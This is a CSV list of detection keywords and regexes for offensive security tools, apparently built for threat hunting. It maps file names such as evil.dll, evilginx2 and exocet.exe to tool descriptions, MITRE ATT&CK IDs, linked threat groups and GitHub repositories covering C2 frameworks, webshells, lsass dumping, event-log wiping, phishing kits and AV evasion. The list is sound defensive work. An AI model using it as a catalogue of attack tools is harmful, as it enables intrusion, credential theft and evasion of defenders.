"*\evi1m0.bat*",".{0,1000}\\evi1m0\.bat.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15333"
"*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","15334"
"*\evil.dll*",".{0,1000}\\evil\.dll.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","N/A","10","7","691","92","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z","15335"
"*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15336"
"*\evil.ps1*",".{0,1000}\\evil\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","15337"
"*\evil_pdf\*",".{0,1000}\\evil_pdf\\.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","15338"
"*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","15339"
"*\evil_script.py*",".{0,1000}\\evil_script\.py.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","15340"
"*\evil32.dll*",".{0,1000}\\evil32\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15341"
"*\evil64.dll*",".{0,1000}\\evil64\.dll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","15342"
"*\EvilClippy*",".{0,1000}\\EvilClippy.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","15343"
"*\EvilClippy-*.zip*",".{0,1000}\\EvilClippy\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","15344"
"*\evilclippy.cs*",".{0,1000}\\evilclippy\.cs.{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","15345"
"*\evilginx2\*",".{0,1000}\\evilginx2\\.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","N/A","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","15346"
"*\EvilLsassTwin\*",".{0,1000}\\EvilLsassTwin\\.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","15347"
"*\EvilnoVNC*",".{0,1000}\\EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","15348"
"*\evil-proxy.rb*",".{0,1000}\\evil\-proxy\.rb.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","15349"
"*\evil-proxy\*",".{0,1000}\\evil\-proxy\\.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","15350"
"*\evilrdp\*",".{0,1000}\\evilrdp\\.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","15351"
"*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15352"
"*\evilscript.ps1*",".{0,1000}\\evilscript\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15353"
"*\evilSignatures.db*",".{0,1000}\\evilSignatures\.db.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","15354"
"*\EvilSln\*.suo*",".{0,1000}\\EvilSln\\.{0,1000}\.suo.{0,1000}","offensive_tool_keyword","EvilSln","A New Exploitation Technique for Visual Studio Projects","T1564.001 - T1204.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/cjm00n/EvilSln","1","0","N/A","N/A","10","","N/A","","","","15355"
"*\evtDeleteRecordbyGetHandle.cpp*",".{0,1000}\\evtDeleteRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15356"
"*\evtDeleteRecordbyGetHandle.exe*",".{0,1000}\\evtDeleteRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15357"
"*\evtDeleteRecordofFile.cpp*",".{0,1000}\\evtDeleteRecordofFile\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15358"
"*\evtDeleteRecordofFile.exe*",".{0,1000}\\evtDeleteRecordofFile\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15359"
"*\evtModifyRecordbyGetHandle.cpp*",".{0,1000}\\evtModifyRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15360"
"*\evtModifyRecordbyGetHandle.exe*",".{0,1000}\\evtModifyRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15361"
"*\evtQueryRecordbyGetHandle.cpp*",".{0,1000}\\evtQueryRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15362"
"*\evtQueryRecordbyGetHandle.exe*",".{0,1000}\\evtQueryRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","N/A","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","15363"
"*\ew.exe -s rssocks*",".{0,1000}\\ew\.exe\s\-s\srssocks.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15364"
"*\ew_for_win_32.exe*",".{0,1000}\\ew_for_win_32\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","15365"
"*\exchanger.py*",".{0,1000}\\exchanger\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","15366"
"*\exe_to_dll\*",".{0,1000}\\exe_to_dll\\.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","0","N/A","N/A","5","10","1297","197","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z","15367"
"*\exec_diskshadow.py*",".{0,1000}\\exec_diskshadow\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15368"
"*\exec_ftp.py*",".{0,1000}\\exec_ftp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15369"
"*\exec_pcalua.py*",".{0,1000}\\exec_pcalua\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15370"
"*\exec_shdocvw.py*",".{0,1000}\\exec_shdocvw\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","15371"
"*\execute_excel4macro.py*",".{0,1000}\\execute_excel4macro\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15372"
"*\execute_excel4macro.txt*",".{0,1000}\\execute_excel4macro\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15373"
"*\execute_registerxll.py*",".{0,1000}\\execute_registerxll\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15374"
"*\execute_registerxll.txt*",".{0,1000}\\execute_registerxll\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","15375"
"*\execute_shellcode.exe*",".{0,1000}\\execute_shellcode\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","15376"
"*\ExecuteCommand_x64_Release.exe*",".{0,1000}\\ExecuteCommand_x64_Release\.exe.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","15377"
"*\Execute-DNSTXT-Code.ps1*",".{0,1000}\\Execute\-DNSTXT\-Code\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15378"
"*\Exegol-*.zip*",".{0,1000}\\Exegol\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15379"
"*\exegol.py*",".{0,1000}\\exegol\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15380"
"*\Exegol-images-*.zip*",".{0,1000}\\Exegol\-images\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15381"
"*\Exegol-images-*\*docker*",".{0,1000}\\Exegol\-images\-.{0,1000}\\.{0,1000}docker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","15382"
"*\exetotext.ps1*",".{0,1000}\\exetotext\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","15383"
"*\exfilGui.ps1*",".{0,1000}\\exfilGui\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","15384"
"*\exfiltrate.exe*",".{0,1000}\\exfiltrate\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","15385"
"*\exocet.elf*",".{0,1000}\\exocet\.elf.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15386"
"*\exocet.exe*",".{0,1000}\\exocet\.exe.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","0","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","15387"
"*\ExpandArchiveCommand.cs",".{0,1000}\\ExpandArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","15388"
"*\exploit.c",".{0,1000}\\exploit\.c","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","15389"
